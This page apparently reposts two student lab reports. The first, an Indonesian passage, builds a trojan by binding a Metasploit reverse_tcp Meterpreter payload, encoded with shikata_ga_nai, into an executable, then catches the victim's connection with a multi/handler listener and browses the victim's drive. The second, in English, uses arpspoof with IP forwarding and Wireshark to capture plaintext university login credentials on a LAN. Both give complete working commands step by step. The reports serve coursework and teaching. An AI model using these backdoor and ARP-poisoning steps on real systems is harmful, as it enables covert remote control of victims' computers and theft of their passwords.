    Metasploit merupakan sofware security yang sering digunakan untuk menguji coba ketahanan suatu sistem dengan cara mengeksploitasi kelemahan software suatu sistem. Metasploit biasanya digunakan untuk menyerang application layer dengan 0 day attack yang merupakan metode penyerangan pada software yang belum di patch. Metasploit biasa dikaitkan dengan istilah remote exploitation,maksudnya penyerang berada pada jarak jangkauan yang jauh dapat mengendalikankomputer korban. Metasploit menyerang dengan cara mengirimkan exploit pada komputer korban. Exploit ini berisi payload yang sudah ditentukan oleh penyerang. Exploit adalah software yang berfungsi untuk memanfaatkan kelemahan padasoftware korban(misal web browser), setelah berhasil mengeksploitasinya exploit tersebut memasukkan payload ke dalam memori korban. Payload merupakan sebuah executable milik penyerang yang akan di run pada komputer korban dengan tujuan dapat mengendalikan komputer tersebut secara remote atau memasang backdoor ,trojan, virus, worm, dan lain-lain. Terlepas dari penggunaan metasploit yang disalahgunakan untuk kejahatan, software ini juga membantu System Security untuk memperkuat pertahanan jaringannya dari ulah penyerang dari luar.

    BAB 3 Metode Percobaan

    3.1 Tempat dan Waktu Percobaan

    Percobaan dilakukan di rumah di Jln. Kusuma Bangsa 5, Denpasar, Bali. Waktu percobaan pada hari Senin, tanggal 5 April 2013, pada jam 23:00 – 24:00.

    3.2 Alat dan Bahan

    Laptop ACER

    • Intel® Pentium® dual – core processor T4200 (2.0 GHz, 800 MHz FSB, 1 MB L2 cache)
    • Mobile Intel® Graphics Media Accelerator 4500MHD
    • 1GB DDR2
    • 128 WXGA Acer CrystalBriteTM LCD
    • 250GB HDD
    • Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet Controller
    • Atheros Communications Inc. AR928X Wireless Network Adapter
    • Operating System Linux Backtrack 5 R3 32 bit

    PC

    • Intel® Pentium® core i5 processor
    • 4 GB RAM
    • 1GB VGA
    • Gigabit Ethernet Controller
    • Alcor Micro, Corp. USB 2.0 PC Camera
    • Operating System Windows 7 Ultimate 32 bit

    3.3 Cara Percobaan

    Jika belum memiliki metasploit maka install dengan command “apt-get install metasploit apache2”. Karena metasploit versi 4.5 maka harus diinstall via web, oleh karena itu diperlukan apache. Lalu buka browser dan buka https://localhost:3790. Dapatkan lisensinya dan upadate diterminal dengan command “msfupdate”. Jika benar maka akan ada folder /opt/metasploit.

    Install metasploit
    Gambar 3.1 Install metasploit

    Untuk melihat jenis payload yang disediakan metasploit maka gunakan “msfpayload -l”. Yang akan digunakan adalah windows/meterpreter/reverse_tcp.

    Melihat payload yang disediakan metasploit 1
    Gambar 3.2 Melihat payload yang disediakan metasploit 1
    Melihat payload yang disediakan metasploit 2
    Gambar 3.3 Melihat payload yang disediakan metasploit 2

    Lihat lah IP address pada perangkat jaringan yang ingin di koneksikan dengan perintah “ifconfig”. Disini IP address adalah 192.168.0.1.

    Melihat IP address perangkat jaringan
    Gambar 3.4 Melihat IP address perangkat jaringan

    Disini file yang akan dilampirkan payload adalah mdma.exe yang terlekatk di /root. Maka perintahnya adalah “msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/mdma.exe -k -o /root/mdma1.exe”. LHOST merupakan listening host yaitu IP address pada perangkat jaringan ini. LPORT merupakan listening port tergantung selera. Berkat msfencode dan shikata_ga_nai maka pelampiran trojan memungkinkan. -e menentukan format yaitu x86, -c menentukan jumlah iterasi, -t memilih extensi file, -x dengan menentukan lokasi file, -k adalah agar payload bekerja pada task lain dengan program aslinya masih tetap bisa berjalan, dan -o adalah tempat dan nama file baru.

    Membuat backdoor
    Gambar 3.5 Membuat backdoor

    Siapkan msfconsole untuk mengendalikan komputer korban. Ketik “-help” jika belum terbiasa pada perintah. Tersedia fasilitas perintah “search [kata apa saja]” untuk melihat perintah yang berkaitan dengan apa yang diketik.

    Msfconsole
    Gambar 3.6 Msfconsole

    Ketik perintah “use exploit/multi/handler” (yang digunakan untuk backdoor). Selanjutnya ketik perintah “set payload windows/meterpreter/reverse_tcp” (payload yang digunakan).

    Menggunakan exploit/multi/handler
    Gambar 3.7 Menggunakan exploit/multi/handler
    Menggunakan windows/meterpreter/reverse_tcp
    Gambar 3.8 Menggunakan windows/meterpreter/reverse_tcp

    Lanjutkan dengan perintah “set lhost 192.168.0.1” (listening host), lalu “set lport 443” (listening port), ketik “show options” untuk melihat pengaturan.

    Mengatur option
    Gambar 3.9 Mengatur option

    Perintah terakhir adalah “exploit”, tinggal menunggu korban menjalankan mdma1.exe.

    Perintah exploit
    Gambar 3.10 Perintah exploit

    BAB 4 Pembahasan

    4.1 Memasuki PC korban dengan backdoor yang telah dibuat

    Asumsi bahwa PC korban tidak menggunakan antivirus dan korban dikirimkan file mdma1.exe dan menjalankannya. Terlihat bahwa program berjalan seperti biasa namun dibuka akses dari PC penyerang. Berikut merupakan konfigurasi IP dari PC korban:

    File mdma1.exe akan dikirim ke PC korban
    Gambar 4.1 File mdma1.exe akan dikirim ke PC korban
    IP Address PC korban
    Gambar 4.2 IP Address PC korban
    IP Address PC korban
    Gambar 4.3 Korban membuka file mdma1.exe
    PC penyerang mendapat akses
    Gambar 4.4 PC penyerang mendapat akses
    tampak isi partisi D pada PC korban
    Gambar 4.5 Dibuktikan dengan melihat directory tampak isi partisi D pada PC korban
    Tampak isi partisi D dari sisi PC penyerang
    Gambar 4.6 Tampak isi partisi D dari sisi PC penyerang

    BAB 5 Penutup

    5.1 Simpulan

    Dari percobaan digambarkan bahwa trojan horse, backdoor dan sejenisnya bekerja secara tersembunyi. Malware disisipkan pada suatu file dan akan bekerja bila file itu dijalankan. Filenya bekerja seperti biasa tetapi juga menjalankan tugas lain berdasarkan malware yang disisipkan. Pada percobaan ini tugas malware adalah memberi akses kepada PC penyerang ke PC korban. Sehingga PC penyerang mendapatkan akses layaknya admin.

    5.2 Saran

    Percobaan ini dapat dikembangkan lebih lanjut. Contohnya dengan PC korban menggunakan antivirus, operating system selain Windows, atau hal – hal lainnya. Bisa juga dengan menggunakan selain msfpayload, membuat program sendiri, membikin trojan konsep baru, atau hal – hal lainnya.

    Mirror

    November 28, 2020

    Man in The Middle Demonstration with Arpspoof and Wireshark

    Illustrasi arp poisoning
    Figure 0. arp poisoning illustration

    Note

    This is my undergraduate assignment that I translated to English myself in the Data Security Systems course where I was only assigned to write an essay on "man in the middle" but I was also interested in practicing it using Arpspoof and Wireshark applications on Linux. Apart from myself, our group consists of my colleagues Yulianti Murprayana, I Made Dwi Angga Pratama, Muhammad Audy Bazly, and I Nyoman Arta Jaya. This task has never been published anywhere and we as the author and copyright holder license this assignment customized CC-BY-SA where anyone can share, copy, republish, and sell it on condition to state our name as the authors and notify that the original and open version available here. If only interested in the practice, just follow the video.

    Chapter 1 Introduction

    1.1 Background

    Wireshark is a software for capturing packets passing on the network called packet sniffing. Sniffing itself means smell, used by dogs to catch traces. Wireshark is not shown to do hacking but as a traffic monitoring and hacking detector software, meaning that it is a software to monitor traffic conditions so that it can detect if there is a breach or something unusual on the network. However, Wireshark can also function as a hacking software.

    Wireshark captures all passing packets, meaning that the username and password that is sent is captured. If you are connected to the network and you can find out what other hosts are connected, it is possible to kill the activities carried out by that host, namely by using ARP (Adress Resolution Protocol) poissoning and sniffing. In this assignment, we will try to capture a host's username and password to various web addresses using a combination of scanning, ARP poissoning and sniffing methods.

    1.2 Problem

    Can we capture usernames and passwords on other hosts that are connected to the same network by scanning, ARP poissoning and sniffing?

    1.3 Objective

    To find out the capture of the username and password by scanning, ARP poissoning and sniffing to elearning.unud.ac.id.

    1.4 Benefit

    1. Knowing how to monitor other hosts on the same network.
    2. Gives knowledge to prevention methods.
    3. Can be encouraged to increase the level of security on the network.
    4. Readers will be more careful about releasing private data on a network.

    1.5 Scope and Boundaries

    1. The capture of the username and password is carried out on the website that is linked to the login elearning.unud.ac.id, blog.unud.ac.id, simak.ft.unud.ac.id.
    2. Experiments are carried out on hosts that are on the same network, LAN (Local Area Network).

    Chapter 2 Literature Review

    2.1 NMAP (Network Mapper)

    NMAP is an open source software that functions to scan the network. NMAP uses RAW IP (Internet Protocol) packets to find out whether there is a host, services provided by the host, see firewalls or filters, and the type of operating system used. Although NMAP is made for scanning large networks, NMAP is also good for checking 1 host (Lyon, 2013).

    2.2 ARP (Address Resolution Protocol)

    ARP works between layer 2 and layer 3 in the OSI (Open System Interconnection) layer because the MAC (Media Access Control) address works at layer 2 and the IP address works at layer 3. ARP is used on TCP/IP networks. ARP functions to convert network addresses at layer 3 to physical addresses at layer 2 (Mitchell, 2013).

    2.3 ARPSpoof

    Is an application for doing ARP poissoning. Arpspoof sends an ARP packet notifying that the MAC address of the gateway is the IP address of the computer performing ARP poissoning. This means that the victim's computer will send traffic to the attacker's computer and then forwarded by the attacker to the gateway. So that information such as username and password can be captured. The original condition is that the victim's computer sends traffic to the gateway so that the other computers cannot capture the packet sent by the victim's computer (Uhlmann, 2003).

    2.4 Sniffing

    Packet sniffing, or packet analysis, is the process of capturing data across a local network and looking for any information that might be of use. Most of the time, we system administrators use packet sniffing to troubleshoot network problems (such as finding out why traffic is so slow on a part of the network) or to detect intrusions or compromised workstations (such as a workstation connected to a remote machine on port 6667 continuously when you're not using an IRC client), and that's what the type of analysis was originally designed for. But, that hasn't stopped people from finding more creative ways to use the tool. The focus quickly moved away from the intention so much that packet sniffers were considered native security tools rather than network tools today (Hannah, 2011).

    Chapter 3 Experimental Method

    3.1 Place and Time of Experiment

    Experiments were carried out at the Computer Lab, Electrical Engineering, Udayana University, Jimbaran, Bali. Trial time on Monday, May 1, 2013, at 20:00 - 24:00.

    3.2 Tools and Materials

    The following are the tools used for research:

    ACER Laptop:

    • Intel® Pentium® dual – core processor T4200 (2.0 GHz, 800 MHz FSB, 1 MB L2 cache)
    • Mobile Intel® Graphics Media Accelerator 4500MHD
    • 1GB DDR2
    • 128 WXGA Acer CrystalBriteTM LCD
    • 250GB HDD
    • Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet Controller
    • Atheros Communications Inc. AR928X Wireless Network Adapter
    • Operating System Linux Backtrack 5 R3 32 bit

    Software:

    • NMAP
    • Telnet
    • Hydra

    The following are the materials used for research:

    PC:

    • Intel® Pentium® core i5 processor
    • 4 GB RAM
    • 1GB VGA
    • Gigabit Ethernet Controller
    • Alcor Micro, Corp. USB 2.0 PC Camera
    • Operating System Windows 7 Ultimate 32 bit

    3.3 Experiment Step

    3.4.1 Scan Host Alive and check IP (Internet Protocol) configuration

    The first thing to do is to see the IP configuration when entering a network that is DHCP (Dynamic Host Configuration Protocol) with the command "ifconfig".

    Konfigurasi PC
    Figure 3.1 PC Configuration

    The second thing to do is to check whether the host is on or off. If the IP address is not known, you can perform scanning in a certain IP (Internet Protocol) address range or with ARP (Address Resolution Protocol). If using nmap the command is "nmap -sn 172.16.150.32/27", this command will check the host alive with the ping application from 172.16.150.32 - 172.16.150.63.

    Hasil scan dengan NMAP
    Figure 3.2 Scan results with NMAP

    Here a host with an IP address of 172.16.150.34 is an experimental material.

    3.4.2 ARP (Address Resolution Protocol) Poisoning

    Before doing ARP poissoning ip_forward must be activated with the command "echo 1 > /proc/sys/net/ipv4/ip_forward". In this assignment ARP poissoning is carried out with the open source Arpspoof software. The command is "arpspoof -i eth0 -t 172.16.150.34 172.16.150.33".

    ARP poisoning dengan arpspoof
    Figure 3.3 ARP poisoning with arpspoof

    3.4.3 Sniffing

    In this assignment, sniffing is done with the open source software Wireshark and captures packets on the eth0 interface (cable).

    ARP poisoning dengan arpspoof
    Figure 3.4 Sniffing with Wireshark

    Chapter 4 Discussion

    4.1 Experiment Results

    To make it easier to search for login results, filter it with only packages originating from 172.16.150.34 and only http types are displayed. To log in usually use a form. Seen in Figure 3.4 source 172.16.150.34 is experimental material and destination 103.29.196.230 is elearning.unud.ac.id. The login protocol type is http. Username and password appear probably because of missing encryption.

    Physical Address Gateway yang tercatat berubah ke Physical Address penyusup
    Figure 4.1 The recorded Physical Address Gateway changes to the intruder Physical Address

    In arpspoof Figure 3.3 is modifying the ARP table where gateway 172.16.150.33 with the mac address CC:EF:48:F8 D0:FF (seen in Figure 3.2) is changed to 00:23:5A:49:B7:F5 in Figure 4.1. This means that the default gateway is changed to the computer that is doing ARP poisoning. So that the experimental material computer will send the package via the computer that does arpspoof first. With ip_forward enabled, packets will be forwarded to the gateway as if there was no disconnection.

    Chapter 5 Conclusion

    5.1 Conclusion

    Capturing username and password can be done by scanning, ARP poissoning and sniffing information contained in the packets that passed. From the experiment it appears that there is no encryption on the username and password in the package to elearning.unud.ac.id, blog.unud.ac.id, simak.ft.unud.ac.id. However, there is MD5 encryption on kaskus.co.id so it is not easy to see the password. In the experiment, scanning used NMAP software, ARP poissoning used Arpspoof software, and sniffing used Wireshark software. With this combination, it can monitor the activity of other hosts on the local network.

    5.2 Future Work

    This paper can be used as further research with hosts having different operating systems, using other software, or a more in-depth discussion of the methods used.

    Reference

    Mirror